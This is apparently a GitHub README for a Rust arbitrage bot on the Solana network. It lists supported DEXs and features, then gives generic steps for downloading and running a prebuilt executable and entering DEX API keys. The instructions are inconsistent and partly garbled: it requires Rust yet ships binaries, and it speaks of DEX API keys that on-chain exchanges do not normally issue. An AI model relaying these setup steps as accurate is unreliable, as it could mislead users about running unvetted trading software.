A Rust bot for arbitrage on the Solana network.
It scans multiple DEXs, identifies profitable routes, and executes transactions with optimized fees.
- Raydium (V4, CPMM, CLMM)
- Orca Whirlpool
- Meteora (DLMM, DAMM v2)
- Pump, SolFi, Vertigo
- Kamino flashloan
- Multi-RPC broadcast
- Priority fee optimization
- Versioned transactions
- Real-time profit tracker
- Performance metrics
- Successful trade statistics
- Operating System: This application works on Windows, macOS, and Linux.
- Rust: You need Rust 1.70 or later. You can install it by following the instructions at Rust Website.
- Visit the Releases Page: To download the application, visit the following link: Download from Releases.
- Select the Relevant File: On the releases page, find the version that matches your operating system and click the download link.
- Locate the Downloaded File: After downloading, go to your Downloads folder or the location where your file saved.
- Unzip the File: If your file is zipped, extract it using software like WinRAR or built-in extraction tools on your operating system.
- Run the Application:
- For Windows, double-click the
.exefile. - For macOS or Linux, open a terminal and navigate to the file's location. Use the command
./<filename>to run the application.
- For Windows, double-click the
- API Keys: You will need API keys from each DEX you want to use. Follow the API documentation provided by the DEXs for setup.
- Configuration Files: Open the configuration file in a text editor. Enter your API keys and any other necessary settings as instructed in the file.
As you run the bot, it offers real-time updates on profits and metrics. Monitor your dashboard to make informed decisions on trades.
If you encounter any issues:
- Check Permissions: Ensure you have permission to execute the file.
- API Errors: Double-check your API keys and configurations.
- Community Support: You can find assistance on forums like GitHub Discussions or Reddit.
- Start with small amounts during initial trades to minimize risks.
- Regularly monitor updates on the repository for changes and improvements.
- Experiment with different DEXs to find the best profit strategies.
If you have suggestions or improvements to propose, feel free to open an issue on the GitHub repository. Your feedback helps us enhance the bot's capabilities.
For further information, always check the GitHub Releases Page for the latest updates and downloads.